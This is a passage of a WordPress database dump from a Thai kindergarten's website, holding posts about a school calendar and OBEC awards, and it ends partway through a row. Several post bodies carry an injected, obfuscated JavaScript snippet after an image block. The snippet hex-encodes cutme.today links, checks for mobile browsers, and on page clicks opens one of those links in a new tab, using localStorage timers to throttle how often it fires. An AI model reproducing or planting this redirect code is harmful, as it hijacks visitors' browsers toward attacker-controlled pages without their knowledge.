_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประกาศโรงเรียนอนุบาลวัดพระโต แจ้งปฏิทินการศึกษาประกาศโรงเรียนอนุบาลวัดพระโต ภาคเรียนที่ 1 ปีการศึกษา 2567ประกาศโรงเรียนอนุบาลวัดพระโต แจ้งปฏิทินการศึกษาประกาศโรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','441-revision-v1','','','2024-09-25 10:04:23','2024-09-25 03:04:23','',441,'http://watprato.ssk.in.th/?p=443',0,'revision','',0),
(444,2,'2024-09-25 14:21:27','2024-09-25 07:21:27','<!-- wp:generateblocks/image {\"uniqueId\":\"6159cfd9\",\"mediaId\":445,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-6159cfd9\"><img class=\"gb-image gb-image-6159cfd9\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092749_0.jpg\" alt=\"\" title=\"S__95092749_0\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS การประกวดรางวัลทรงคุณค่า สพฐ.(OBEC AWADS) ระดับภาคตะวันออกเฉียงเหนือ ครั้งที่ 12 ประจำปีการศึกษา 2565-2566 รางวัลทรงคุณค่า OBEC AWARDS','','publish','open','open','','%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%a5%e0%b8%97%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%84%e0%b9%88%e0%b8%b2-obec-awards','','','2024-09-25 14:30:01','2024-09-25 07:30:01','',0,'http://watprato.ssk.in.th/?p=444',0,'post','',0),
(445,2,'2024-09-25 14:21:10','2024-09-25 07:21:10','','S__95092749_0','','inherit','open','closed','','s__95092749_0','','','2024-09-25 14:21:10','2024-09-25 07:21:10','',444,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092749_0.jpg',0,'attachment','image/jpeg',0),
(446,2,'2024-09-25 14:21:27','2024-09-25 07:21:27','<!-- wp:generateblocks/image {\"uniqueId\":\"6159cfd9\",\"mediaId\":445,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-6159cfd9\"><img class=\"gb-image gb-image-6159cfd9\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092749_0.jpg\" alt=\"\" title=\"S__95092749_0\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 